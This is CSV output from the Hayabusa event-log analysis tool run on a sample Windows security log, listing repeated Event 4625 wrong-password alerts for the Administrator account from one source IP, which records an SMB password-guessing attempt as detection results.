2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
